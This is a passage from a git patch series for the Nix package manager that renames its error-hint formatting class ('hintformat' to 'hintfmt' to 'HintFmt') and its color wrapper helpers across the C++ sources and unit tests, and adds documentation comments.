b/src/build-remote/build-remote.cc index 519e03242..94b672976 100644 --- a/src/build-remote/build-remote.cc +++ b/src/build-remote/build-remote.cc @@ -202,7 +202,7 @@ static int main_build_remote(int argc, char * * argv) else drvstr = ""; - auto error = hintformat(errorText); + auto error = hintfmt(errorText); error % drvstr % neededSystem diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 3c7c5da27..f72135527 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -148,7 +148,7 @@ struct DebugTrace { std::shared_ptr pos; const Expr & expr; const Env & env; - hintformat hint; + hintfmt hint; bool isError; }; diff --git a/src/libexpr/value/context.hh b/src/libexpr/value/context.hh index 51fd30a44..2abd1c9d4 100644 --- a/src/libexpr/value/context.hh +++ b/src/libexpr/value/context.hh @@ -20,7 +20,7 @@ public: { raw = raw_; auto hf = hintfmt(args...); - err.msg = hintfmt("Bad String Context element: %1%: %2%", normaltxt(hf.str()), raw); + err.msg = hintfmt("Bad String Context element: %1%: %2%", Uncolored(hf.str()), raw); } }; diff --git a/src/libstore/build/derivation-goal.cc b/src/libstore/build/derivation-goal.cc index 454c35763..d3bbdf1ed 100644 --- a/src/libstore/build/derivation-goal.cc +++ b/src/libstore/build/derivation-goal.cc @@ -708,7 +708,7 @@ void DerivationGoal::tryToBuild() if (!outputLocks.lockPaths(lockFiles, "", false)) { if (!actLock) actLock = std::make_unique(*logger, lvlWarn, actBuildWaiting, - fmt("waiting for lock on %s", magentatxt(showPaths(lockFiles)))); + fmt("waiting for lock on %s", Magenta(showPaths(lockFiles)))); worker.waitForAWhile(shared_from_this()); return; } @@ -762,7 +762,7 @@ void DerivationGoal::tryToBuild() the wake-up timeout expires. */ if (!actLock) actLock = std::make_unique(*logger, lvlWarn, actBuildWaiting, - fmt("waiting for a machine to build '%s'", magentatxt(worker.store.printStorePath(drvPath)))); + fmt("waiting for a machine to build '%s'", Magenta(worker.store.printStorePath(drvPath)))); worker.waitForAWhile(shared_from_this()); outputLocks.unlock(); return; @@ -987,7 +987,7 @@ void DerivationGoal::buildDone() diskFull |= cleanupDecideWhetherDiskFull(); auto msg = fmt("builder for '%s' %s", - magentatxt(worker.store.printStorePath(drvPath)), + Magenta(worker.store.printStorePath(drvPath)), statusToString(status)); if (!logger->isVerbose() && !logTail.empty()) { @@ -1523,7 +1523,7 @@ void DerivationGoal::done( outputLocks.unlock(); buildResult.status = status; if (ex) - buildResult.errorMsg = fmt("%s", normaltxt(ex->info().msg)); + buildResult.errorMsg = fmt("%s", Uncolored(ex->info().msg)); if (buildResult.status == BuildResult::TimedOut) worker.timedOut = true; if (buildResult.status == BuildResult::PermanentFailure) diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index ce8943efe..a2f411b8a 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -232,7 +232,7 @@ void LocalDerivationGoal::tryLocalBuild() if (!buildUser) { if (!actLock) actLock = std::make_unique(*logger, lvlWarn, actBuildWaiting, - fmt("waiting for a free build user ID for '%s'", magentatxt(worker.store.printStorePath(drvPath)))); + fmt("waiting for a free build user ID for '%s'", Magenta(worker.store.printStorePath(drvPath)))); worker.waitForAWhile(shared_from_this()); return; } diff --git a/src/libstore/filetransfer.cc b/src/libstore/filetransfer.cc index dcbec4acd..eb39be158 100644 --- a/src/libstore/filetransfer.cc +++ b/src/libstore/filetransfer.cc @@ -887,7 +887,7 @@ FileTransferError::FileTransferError(FileTransfer::Error error, std::optionalsize() < 1024 || response->find("") != std::string::npos)) - err.msg = hintfmt("%1%\n\nresponse body:\n\n%2%", normaltxt(hf.str()), chomp(*response)); + err.msg = hintfmt("%1%\n\nresponse body:\n\n%2%", Uncolored(hf.str()), chomp(*response)); else err.msg = hf; } diff --git a/src/libstore/sqlite.cc b/src/libstore/sqlite.cc index d7432a305..ff14ec420 100644 --- a/src/libstore/sqlite.cc +++ b/src/libstore/sqlite.cc @@ -10,19 +10,19 @@ namespace nix { -SQLiteError::SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, hintformat && hf) +SQLiteError::SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, hintfmt && hf) : Error(""), path(path), errMsg(errMsg), errNo(errNo), extendedErrNo(extendedErrNo), offset(offset) { auto offsetStr = (offset == -1) ? "" : "at offset " + std::to_string(offset) + ": "; err.msg = hintfmt("%s: %s%s, %s (in '%s')", - normaltxt(hf.str()), + Uncolored(hf.str()), offsetStr, sqlite3_errstr(extendedErrNo), errMsg, path ? path : "(in-memory)"); } -[[noreturn]] void SQLiteError::throw_(sqlite3 * db, hintformat && hf) +[[noreturn]] void SQLiteError::throw_(sqlite3 * db, hintfmt && hf) { int err = sqlite3_errcode(db); int exterr = sqlite3_extended_errcode(db); diff --git a/src/libstore/sqlite.hh b/src/libstore/sqlite.hh index 0c08267f7..33ebb5892 100644 --- a/src/libstore/sqlite.hh +++ b/src/libstore/sqlite.hh @@ -145,16 +145,16 @@ struct SQLiteError : Error throw_(db, hintfmt(fs, args...)); } - SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, hintformat && hf); + SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, hintfmt && hf); protected: template SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, const std::string & fs, const Args & ... args) - : SQLiteError(path, errNo, extendedErrNo, offset, hintfmt(fs, args...)) + : SQLiteError(path, errMsg, errNo, extendedErrNo, offset, hintfmt(fs, args...)) { } - [[noreturn]] static void throw_(sqlite3 * db, hintformat && hf); + [[noreturn]] static void throw_(sqlite3 * db, hintfmt && hf); }; diff --git a/src/libutil/error.cc b/src/libutil/error.cc index e4e50d73b..e3b30b3a1 100644 --- a/src/libutil/error.cc +++ b/src/libutil/error.cc @@ -11,7 +11,7 @@ namespace nix { -void BaseError::addTrace(std::shared_ptr && e, hintformat hint, bool frame) +void BaseError::addTrace(std::shared_ptr && e, hintfmt hint, bool frame) { err.traces.push_front(Trace { .pos = std::move(e), .hint = hint, .frame = frame }); } @@ -37,7 +37,7 @@ const std::string & BaseError::calcWhat() const std::optional ErrorInfo::programName = std::nullopt; -std::ostream & operator <<(std::ostream & os, const hintformat & hf) +std::ostream & operator <<(std::ostream & os, const hintfmt & hf) { return os << hf.str(); } diff --git a/src/libutil/error.hh b/src/libutil/error.hh index 4fb822843..966f4d770 100644 --- a/src/libutil/error.hh +++ b/src/libutil/error.hh @@ -63,7 +63,7 @@ void printCodeLines(std::ostream & out, struct Trace { std::shared_ptr pos; - hintformat hint; + hintfmt hint; bool frame; }; @@ -74,7 +74,7 @@ inline bool operator>=(const Trace& lhs, const Trace& rhs); struct ErrorInfo { Verbosity level; - hintformat msg; + hintfmt msg; std::shared_ptr pos; std::list traces; @@ -126,7 +126,7 @@ public: : err { .level = lvlError, .msg = hintfmt(args...), .suggestions = sug } { } - BaseError(hintformat hint) + BaseError(hintfmt hint) : err { .level = lvlError, .msg = hint } { } @@ -162,7 +162,7 @@ public: addTrace(std::move(e), hintfmt(std::string(fs), args...)); } - void addTrace(std::shared_ptr && e, hintformat hint, bool frame = false); + void addTrace(std::shared_ptr && e, hintfmt hint, bool frame = false); bool hasTrace() const { return !err.traces.empty(); } @@ -215,7 +215,7 @@ public: : SystemError(""), errNo(errNo) { auto hf = hintfmt(args...); - err.msg = hintfmt("%1%: %2%", normaltxt(hf.str()), strerror(errNo)); + err.msg = hintfmt("%1%: %2%", Uncolored(hf.str()), strerror(errNo)); } /** diff --git a/src/libutil/fmt.hh b/src/libutil/fmt.hh index 6430c7707..9c2cc1e85 100644 --- a/src/libutil/fmt.hh +++ b/src/libutil/fmt.hh @@ -8,37 +8,53 @@ namespace nix { - +namespace { /** - * Inherit some names from other namespaces for convenience. - */ -using boost::format; - - -/** - * A variadic template that does nothing. Useful to call a function - * for all variadic arguments but ignoring the result. - */ -struct nop { template nop(T...) {} }; - - -/** - * A helper for formatting strings. ‘fmt(format, a_0, ..., a_n)’ is - * equivalent to ‘boost::format(format) % a_0 % ... % - * ... a_n’. However, ‘fmt(s)’ is equivalent to ‘s’ (so no %-expansion - * takes place). + * A helper for writing `boost::format` expressions. + * + * These are equivalent: + * + * ``` + * formatHelper(formatter, a_0, ..., a_n) + * formatter % a_0 % ... % a_n + * ``` + * + * With a single argument, `formatHelper(s)` is a no-op. */ template inline void formatHelper(F & f) -{ -} +{ } template inline void formatHelper(F & f, const T & x, const Args & ... args) { + // Interpolate one argument and then recurse. formatHelper(f % x, args...); } +} +/** + * A helper for writing a `boost::format` expression to a string. + * + * These are (roughly) equivalent: + * + * ``` + * fmt(formatString, a_0, ..., a_n) + * (boost::format(formatString) % a_0 % ... % a_n).str() + * ``` + * + * However, when called with a single argument, the string is returned + * unchanged. + * + * If you write code like this: + * + * ``` + * std::cout << boost::format(stringFromUserInput) << std::endl; + * ``` + * + * And `stringFromUserInput` contains formatting placeholders like `%s`, then + * the code will crash at runtime. `fmt` helps you avoid this pitfall. + */ inline std::string fmt(const std::string & s) { return s; @@ -63,61 +79,107 @@ inline std::string fmt(const std::string & fs, const Args & ... args) return f.str(); } -// format function for hints in errors. same as fmt, except templated values -// are always in magenta. +/** + * Values wrapped in this struct are printed in magenta. + * + * By default, arguments to `hintfmt` are printed in magenta. To avoid this, + * either wrap the argument in `Uncolored` or add a specialization of + * `hintfmt::operator%`. + */ template -struct magentatxt +struct Magenta { - magentatxt(const T &s) : value(s) {} + Magenta(const T &s) : value(s) {} const T & value; }; template -std::ostream & operator<<(std::ostream & out, const magentatxt & y) +std::ostream & operator<<(std::ostream & out, const Magenta & y) { return out << ANSI_WARNING << y.value << ANSI_NORMAL; } +/** + * Values wrapped in this class are printed without coloring. + * + * By default, arguments to `hintfmt` are printed in magenta (see `Magenta`). + */ template -struct normaltxt +struct Uncolored { - normaltxt(const T & s) : value(s) {} + Uncolored(const T & s) : value(s) {} const T & value; }; template -std::ostream & operator<<(std::ostream & out, const normaltxt & y) +std::ostream & operator<<(std::ostream & out, const Uncolored & y) { return out << ANSI_NORMAL << y.value; } -class hintformat +/** + * A wrapper around `boost::format` which colors interpolated arguments in + * magenta by default. + */ +class hintfmt { +private: + boost::format fmt; + public: - hintformat(const std::string & format) : fmt(format) + /** + * Construct a `hintfmt` from a format string, with values to be + * interpolated later with `%`. + * + * This isn't exposed as a single-argument constructor to avoid + * accidentally constructing `hintfmt`s with user-controlled strings. See + * the note on `fmt` for more information. + */ + static hintfmt interpolate(const std::string & formatString) { - fmt.exceptions(boost::io::all_error_bits ^ - boost::io::too_many_args_bit ^ - boost::io::too_few_args_bit); + hintfmt result((boost::format(formatString))); + result.fmt.exceptions( + boost::io::all_error_bits ^ + boost::io::too_many_args_bit ^ + boost::io::too_few_args_bit); + return result; } - hintformat(const hintformat & hf) + /** + * Format the given string literally, without interpolating format + * placeholders. + */ + hintfmt(const std::string & literal) + : hintfmt("%s", Uncolored(literal)) + { } + + /** + * Interpolate the given arguments into the format string. + */ + template + hintfmt(const std::string & format, const Args & ... args) + : fmt(format) + { + formatHelper(*this, args...); + } + + hintfmt(const hintfmt & hf) : fmt(hf.fmt) { } - hintformat(format && fmt) + hintfmt(boost::format && fmt) : fmt(std::move(fmt)) { } template - hintformat & operator%(const T & value) + hintfmt & operator%(const T & value) { - fmt % magentatxt(value); + fmt % Magenta(value); return *this; } template - hintformat & operator%(const normaltxt & value) + hintfmt & operator%(const Uncolored & value) { fmt % value.value; return *this; @@ -127,25 +189,8 @@ public: { return fmt.str(); } - -private: - format fmt; }; -std::ostream & operator<<(std::ostream & os, const hintformat & hf); - -template -inline hintformat hintfmt(const std::string & fs, const Args & ... args) -{ - hintformat f(fs); - formatHelper(f, args...); - return f; -} - -inline hintformat hintfmt(const std::string & plain_string) -{ - // we won't be receiving any args in this case, so just print the original string - return hintfmt("%s", normaltxt(plain_string)); -} +std::ostream & operator<<(std::ostream & os, const hintfmt & hf); } diff --git a/src/libutil/logging.hh b/src/libutil/logging.hh index 183f2d8e1..9e81132e3 100644 --- a/src/libutil/logging.hh +++ b/src/libutil/logging.hh @@ -120,6 +120,17 @@ public: { } }; +/** + * A variadic template that does nothing. + * + * Useful to call a function with each argument in a parameter pack. + */ +struct nop +{ + template nop(T...) + { } +}; + ActivityId getCurActivity(); void setCurActivity(const ActivityId activityId); diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index 8e8726195..3cfa2b61b 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -53,7 +53,6 @@ namespace nix { state.error("beans").debugThrow(); } catch (Error & e2) { e.addTrace(state.positions[noPos], "beans2", ""); - //e2.addTrace(state.positions[noPos], "Something", ""); ASSERT_TRUE(e.info().traces.size() == 2); ASSERT_TRUE(e2.info().traces.size() == 0); ASSERT_FALSE(&e.info() == &e2.info()); diff --git a/tests/unit/libutil/logging.cc b/tests/unit/libutil/logging.cc index 8950a26d4..c8c7c091f 100644 --- a/tests/unit/libutil/logging.cc +++ b/tests/unit/libutil/logging.cc @@ -62,7 +62,7 @@ namespace nix { throw TestError(e.info()); } catch (Error &e) { ErrorInfo ei = e.info(); - ei.msg = hintfmt("%s; subsequent error message.", normaltxt(e.info().msg.str())); + ei.msg = hintfmt("%s; subsequent error message.", Uncolored(e.info().msg.str())); testing::internal::CaptureStderr(); logger->logEI(ei); From c0e7f50c1a46693d06fab8a36526a4beaa702389 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 3 Feb 2024 20:35:19 -0800 Subject: [PATCH 427/654] Rename `hintfmt` to `HintFmt` --- src/build-remote/build-remote.cc | 2 +- src/libexpr/eval-error.cc | 10 +- src/libexpr/eval-error.hh | 2 +- src/libexpr/eval.cc | 8 +- src/libexpr/eval.hh | 2 +- src/libexpr/flake/flake.cc | 4 +- src/libexpr/lexer.l | 6 +- src/libexpr/parser-state.hh | 8 +- src/libexpr/parser.y | 8 +- src/libexpr/primops.cc | 10 +- src/libexpr/primops/fetchClosure.cc | 22 +- src/libexpr/print.cc | 2 +- src/libexpr/print.hh | 2 +- src/libexpr/value-to-json.cc | 4 +- src/libexpr/value/context.hh | 4 +- src/libstore/build/local-derivation-goal.cc | 2 +- src/libstore/filetransfer.cc | 4 +- src/libstore/sqlite.cc | 10 +- src/libstore/sqlite.hh | 8 +- src/libutil/current-process.cc | 2 +- src/libutil/error.cc | 4 +- src/libutil/error.hh | 20 +- src/libutil/fmt.hh | 67 +- src/libutil/serialise.cc | 4 +- src/nix/daemon.cc | 2 +- src/nix/eval.cc | 2 +- src/nix/flake.cc | 18 +- tests/unit/libexpr/error_traces.cc | 651 ++++++++++---------- tests/unit/libutil/logging.cc | 36 +- 29 files changed, 460 insertions(+), 464 deletions(-) diff --git a/src/build-remote/build-remote.cc b/src/build-remote/build-remote.cc index 94b672976..118468477 100644 --- a/src/build-remote/build-remote.cc +++ b/src/build-remote/build-remote.cc @@ -202,7 +202,7 @@ static int main_build_remote(int argc, char * * argv) else drvstr = ""; - auto error = hintfmt(errorText); + auto error = HintFmt(errorText); error % drvstr % neededSystem diff --git a/src/libexpr/eval-error.cc b/src/libexpr/eval-error.cc index 250c59a19..f4cdeec5c 100644 --- a/src/libexpr/eval-error.cc +++ b/src/libexpr/eval-error.cc @@ -28,7 +28,7 @@ template EvalErrorBuilder & EvalErrorBuilder::withTrace(PosIdx pos, const std::string_view text) { error.err.traces.push_front( - Trace{.pos = error.state.positions[pos], .hint = hintfmt(std::string(text)), .frame = false}); + Trace{.pos = error.state.positions[pos], .hint = HintFmt(std::string(text)), .frame = false}); return *this; } @@ -36,7 +36,7 @@ template EvalErrorBuilder & EvalErrorBuilder::withFrameTrace(PosIdx pos, const std::string_view text) { error.err.traces.push_front( - Trace{.pos = error.state.positions[pos], .hint = hintformat(std::string(text)), .frame = true}); + Trace{.pos = error.state.positions[pos], .hint = HintFmt(std::string(text)), .frame = true}); return *this; } @@ -57,13 +57,13 @@ EvalErrorBuilder & EvalErrorBuilder::withFrame(const Env & env, const Expr .pos = error.state.positions[expr.getPos()], .expr = expr, .env = env, - .hint = hintformat("Fake frame for debugging purposes"), + .hint = HintFmt("Fake frame for debugging purposes"), .isError = true}); return *this; } template -EvalErrorBuilder & EvalErrorBuilder::addTrace(PosIdx pos, hintformat hint, bool frame) +EvalErrorBuilder & EvalErrorBuilder::addTrace(PosIdx pos, HintFmt hint, bool frame) { error.addTrace(error.state.positions[pos], hint, frame); return *this; @@ -75,7 +75,7 @@ EvalErrorBuilder & EvalErrorBuilder::addTrace(PosIdx pos, std::string_view formatString, const Args &... formatArgs) { - addTrace(error.state.positions[pos], hintfmt(std::string(formatString), formatArgs...)); + addTrace(error.state.positions[pos], HintFmt(std::string(formatString), formatArgs...)); return *this; } diff --git a/src/libexpr/eval-error.hh b/src/libexpr/eval-error.hh index 711743886..392902ad2 100644 --- a/src/libexpr/eval-error.hh +++ b/src/libexpr/eval-error.hh @@ -89,7 +89,7 @@ public: [[nodiscard, gnu::noinline]] EvalErrorBuilder & withFrame(const Env & e, const Expr & ex); - [[nodiscard, gnu::noinline]] EvalErrorBuilder & addTrace(PosIdx pos, hintformat hint, bool frame = false); + [[nodiscard, gnu::noinline]] EvalErrorBuilder & addTrace(PosIdx pos, HintFmt hint, bool frame = false); template [[nodiscard, gnu::noinline]] EvalErrorBuilder & diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 5bc62589c..bffbd5f1a 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -803,7 +803,7 @@ void EvalState::addErrorTrace(Error & e, const char * s, const std::string & s2) void EvalState::addErrorTrace(Error & e, const PosIdx pos, const char * s, const std::string & s2, bool frame) const { - e.addTrace(positions[pos], hintfmt(s, s2), frame); + e.addTrace(positions[pos], HintFmt(s, s2), frame); } template @@ -819,7 +819,7 @@ static std::unique_ptr makeDebugTraceStacker( .pos = std::move(pos), .expr = expr, .env = env, - .hint = hintfmt(formatArgs...), + .hint = HintFmt(formatArgs...), .isError = false }); } @@ -2792,7 +2792,7 @@ std::optional EvalState::resolveSearchPathPath(const SearchPath::Pa res = { store->toRealPath(storePath) }; } catch (FileTransferError & e) { logWarning({ - .msg = hintfmt("Nix search path entry '%1%' cannot be downloaded, ignoring", value) + .msg = HintFmt("Nix search path entry '%1%' cannot be downloaded, ignoring", value) }); } } @@ -2825,7 +2825,7 @@ std::optional EvalState::resolveSearchPathPath(const SearchPath::Pa res = { path }; else { logWarning({ - .msg = hintfmt("Nix search path entry '%1%' does not exist, ignoring", value) + .msg = HintFmt("Nix search path entry '%1%' does not exist, ignoring", value) }); res = std::nullopt; } diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index f72135527..756ab98e3 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -148,7 +148,7 @@ struct DebugTrace { std::shared_ptr pos; const Expr & expr; const Env & env; - hintfmt hint; + HintFmt hint; bool isError; }; diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc index 3396b0219..451780c89 100644 --- a/src/libexpr/flake/flake.cc +++ b/src/libexpr/flake/flake.cc @@ -155,7 +155,7 @@ static FlakeInput parseFlakeInput(EvalState & state, } catch (Error & e) { e.addTrace( state.positions[attr.pos], - hintfmt("while evaluating flake attribute '%s'", state.symbols[attr.name])); + HintFmt("while evaluating flake attribute '%s'", state.symbols[attr.name])); throw; } } @@ -164,7 +164,7 @@ static FlakeInput parseFlakeInput(EvalState & state, try { input.ref = FlakeRef::fromAttrs(attrs); } catch (Error & e) { - e.addTrace(state.positions[pos], hintfmt("while evaluating flake input")); + e.addTrace(state.positions[pos], HintFmt("while evaluating flake input")); throw; } else { diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index af67e847d..380048c77 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -147,7 +147,7 @@ or { return OR_KW; } yylval->n = boost::lexical_cast(yytext); } catch (const boost::bad_lexical_cast &) { throw ParseError(ErrorInfo{ - .msg = hintfmt("invalid integer '%1%'", yytext), + .msg = HintFmt("invalid integer '%1%'", yytext), .pos = state->positions[CUR_POS], }); } @@ -157,7 +157,7 @@ or { return OR_KW; } yylval->nf = strtod(yytext, 0); if (errno != 0) throw ParseError(ErrorInfo{ - .msg = hintfmt("invalid float '%1%'", yytext), + .msg = HintFmt("invalid float '%1%'", yytext), .pos = state->positions[CUR_POS], }); return FLOAT_LIT; @@ -286,7 +286,7 @@ or { return OR_KW; } {ANY} | <> { throw ParseError(ErrorInfo{ - .msg = hintfmt("path has a trailing slash"), + .msg = HintFmt("path has a trailing slash"), .pos = state->positions[CUR_POS], }); } diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh index bdd5bbabe..87aeaeef5 100644 --- a/src/libexpr/parser-state.hh +++ b/src/libexpr/parser-state.hh @@ -64,7 +64,7 @@ struct ParserState inline void ParserState::dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos) { throw ParseError({ - .msg = hintfmt("attribute '%1%' already defined at %2%", + .msg = HintFmt("attribute '%1%' already defined at %2%", showAttrPath(symbols, attrPath), positions[prevPos]), .pos = positions[pos] }); @@ -73,7 +73,7 @@ inline void ParserState::dupAttr(const AttrPath & attrPath, const PosIdx pos, co inline void ParserState::dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos) { throw ParseError({ - .msg = hintfmt("attribute '%1%' already defined at %2%", symbols[attr], positions[prevPos]), + .msg = HintFmt("attribute '%1%' already defined at %2%", symbols[attr], positions[prevPos]), .pos = positions[pos] }); } @@ -154,13 +154,13 @@ inline Formals * ParserState::validateFormals(Formals * formals, PosIdx pos, Sym } if (duplicate) throw ParseError({ - .msg = hintfmt("duplicate formal function argument '%1%'", symbols[duplicate->first]), + .msg = HintFmt("duplicate formal function argument '%1%'", symbols[duplicate->first]), .pos = positions[duplicate->second] }); if (arg && formals->has(arg)) throw ParseError({ - .msg = hintfmt("duplicate formal function argument '%1%'", symbols[arg]), + .msg = HintFmt("duplicate formal function argument '%1%'", symbols[arg]), .pos = positions[pos] }); diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index 95f45c80a..a3ba13c66 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -65,7 +65,7 @@ using namespace nix; void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char * error) { throw ParseError({ - .msg = hintfmt(error), + .msg = HintFmt(error), .pos = state->positions[state->at(*loc)] }); } @@ -154,7 +154,7 @@ expr_function | LET binds IN_KW expr_function { if (!$2->dynamicAttrs.empty()) throw ParseError({ - .msg = hintfmt("dynamic attributes not allowed in let"), + .msg = HintFmt("dynamic attributes not allowed in let"), .pos = state->positions[CUR_POS] }); $$ = new ExprLet($2, $4); @@ -244,7 +244,7 @@ expr_simple static bool noURLLiterals = experimentalFeatureSettings.isEnabled(Xp::NoUrlLiterals); if (noURLLiterals) throw ParseError({ - .msg = hintfmt("URL literals are disabled"), + .msg = HintFmt("URL literals are disabled"), .pos = state->positions[CUR_POS] }); $$ = new ExprString(std::string($1)); @@ -340,7 +340,7 @@ attrs delete str; } else throw ParseError({ - .msg = hintfmt("dynamic attributes not allowed in inherit"), + .msg = HintFmt("dynamic attributes not allowed in inherit"), .pos = state->positions[state->at(@2)] }); } diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 5e2bbe16f..8c6aeffac 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -754,7 +754,7 @@ static RegisterPrimOp primop_break({ if (state.debugRepl && !state.debugTraces.empty()) { auto error = Error(ErrorInfo { .level = lvlInfo, - .msg = hintfmt("breakpoint reached"), + .msg = HintFmt("breakpoint reached"), .pos = state.positions[pos], }); @@ -765,7 +765,7 @@ static RegisterPrimOp primop_break({ // If the user elects to quit the repl, throw an exception. throw Error(ErrorInfo{ .level = lvlInfo, - .msg = hintfmt("quit the debugger"), + .msg = HintFmt("quit the debugger"), .pos = nullptr, }); } @@ -820,7 +820,7 @@ static void prim_addErrorContext(EvalState & state, const PosIdx pos, Value * * auto message = state.coerceToString(pos, *args[0], context, "while evaluating the error message passed to builtins.addErrorContext", false, false).toOwned(); - e.addTrace(nullptr, hintfmt(message), true); + e.addTrace(nullptr, HintFmt(message), true); throw; } } @@ -1071,7 +1071,7 @@ static void prim_derivationStrict(EvalState & state, const PosIdx pos, Value * * * often results from the composition of several functions * (derivationStrict, derivation, mkDerivation, mkPythonModule, etc.) */ - e.addTrace(nullptr, hintfmt( + e.addTrace(nullptr, HintFmt( "while evaluating derivation '%s'\n" " whose name attribute is located at %s", drvName, pos), true); @@ -1232,7 +1232,7 @@ drvName, Bindings * attrs, Value & v) } catch (Error & e) { e.addTrace(state.positions[i->pos], - hintfmt("while evaluating attribute '%1%' of derivation '%2%'", key, drvName), + HintFmt("while evaluating attribute '%1%' of derivation '%2%'", key, drvName), true); throw; } diff --git a/src/libexpr/primops/fetchClosure.cc b/src/libexpr/primops/fetchClosure.cc index 5806b3ff9..f51a6465d 100644 --- a/src/libexpr/primops/fetchClosure.cc +++ b/src/libexpr/primops/fetchClosure.cc @@ -23,7 +23,7 @@ static void runFetchClosureWithRewrite(EvalState & state, const PosIdx pos, Stor auto rewrittenPath = makeContentAddressed(fromStore, *state.store, fromPath); if (toPathMaybe && *toPathMaybe != rewrittenPath) throw Error({ - .msg = hintfmt("rewriting '%s' to content-addressed form yielded '%s', while '%s' was expected", + .msg = HintFmt("rewriting '%s' to content-addressed form yielded '%s', while '%s' was expected", state.store->printStorePath(fromPath), state.store->printStorePath(rewrittenPath), state.store->printStorePath(*toPathMaybe)), @@ -31,7 +31,7 @@ static void runFetchClosureWithRewrite(EvalState & state, const PosIdx pos, Stor }); if (!toPathMaybe) throw Error({ - .msg = hintfmt( + .msg = HintFmt( "rewriting '%s' to content-addressed form yielded '%s'\n" "Use this value for the 'toPath' attribute passed to 'fetchClosure'", state.store->printStorePath(fromPath), @@ -50,7 +50,7 @@ static void runFetchClosureWithRewrite(EvalState & state, const PosIdx pos, Stor // We don't perform the rewriting when outPath already exists, as an optimisation. // However, we can quickly detect a mistake if the toPath is input addressed. throw Error({ - .msg = hintfmt( + .msg = HintFmt( "The 'toPath' value '%s' is input-addressed, so it can't possibly be the result of rewriting to a content-addressed path.\n\n" "Set 'toPath' to an empty string to make Nix report the correct content-addressed path.", state.store->printStorePath(toPath)), @@ -73,7 +73,7 @@ static void runFetchClosureWithContentAddressedPath(EvalState & state, const Pos if (!info->isContentAddressed(*state.store)) { throw Error({ - .msg = hintfmt( + .msg = HintFmt( "The 'fromPath' value '%s' is input-addressed, but 'inputAddressed' is set to 'false' (default).\n\n" "If you do intend to fetch an input-addressed store path, add\n\n" " inputAddressed = true;\n\n" @@ -99,7 +99,7 @@ static void runFetchClosureWithInputAddressedPath(EvalState & state, const PosId if (info->isContentAddressed(*state.store)) { throw Error({ - .msg = hintfmt( + .msg = HintFmt( "The store object referred to by 'fromPath' at '%s' is not input-addressed, but 'inputAddressed' is set to 'true'.\n\n" "Remove the 'inputAddressed' attribute (it defaults to 'false') to expect 'fromPath' to be content-addressed", state.store->printStorePath(fromPath)), @@ -153,14 +153,14 @@ static void prim_fetchClosure(EvalState & state, const PosIdx pos, Value * * arg else throw Error({ - .msg = hintfmt("attribute '%s' isn't supported in call to 'fetchClosure'", attrName), + .msg = HintFmt("attribute '%s' isn't supported in call to 'fetchClosure'", attrName), .pos = state.positions[pos] }); } if (!fromPath) throw Error({ - .msg = hintfmt("attribute '%s' is missing in call to 'fetchClosure'", "fromPath"), + .msg = HintFmt("attribute '%s' is missing in call to 'fetchClosure'", "fromPath"), .pos = state.positions[pos] }); @@ -169,7 +169,7 @@ static void prim_fetchClosure(EvalState & state, const PosIdx pos, Value * * arg if (inputAddressed) { if (toPath) throw Error({ - .msg = hintfmt("attribute '%s' is set to true, but '%s' is also set. Please remove one of them", + .msg = HintFmt("attribute '%s' is set to true, but '%s' is also set. Please remove one of them", "inputAddressed", "toPath"), .pos = state.positions[pos] @@ -178,7 +178,7 @@ static void prim_fetchClosure(EvalState & state, const PosIdx pos, Value * * arg if (!fromStoreUrl) throw Error({ - .msg = hintfmt("attribute '%s' is missing in call to 'fetchClosure'", "fromStore"), + .msg = HintFmt("attribute '%s' is missing in call to 'fetchClosure'", "fromStore"), .pos = state.positions[pos] }); @@ -188,13 +188,13 @@ static void prim_fetchClosure(EvalState & state, const PosIdx pos, Value * * arg parsedURL.scheme != "https" && !(getEnv("_NIX_IN_TEST").has_value() && parsedURL.scheme == "file")) throw Error({ - .msg = hintfmt("'fetchClosure' only supports http:// and https:// stores"), + .msg = HintFmt("'fetchClosure' only supports http:// and https:// stores"), .pos = state.positions[pos] }); if (!parsedURL.query.empty()) throw Error({ - .msg = hintfmt("'fetchClosure' does not support URL query parameters (in '%s')", *fromStoreUrl), + .msg = HintFmt("'fetchClosure' does not support URL query parameters (in '%s')", *fromStoreUrl), .pos = state.positions[pos] }); diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 9f31f3340..7e90e47eb 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -512,7 +512,7 @@ std::ostream & operator<<(std::ostream & output, const ValuePrinter & printer) } template<> -hintformat & hintformat::operator%(const ValuePrinter & value) +HintFmt & HintFmt::operator%(const ValuePrinter & value) { fmt % value; return *this; diff --git a/src/libexpr/print.hh b/src/libexpr/print.hh index a542bc7b1..7ddda81b8 100644 --- a/src/libexpr/print.hh +++ b/src/libexpr/print.hh @@ -86,6 +86,6 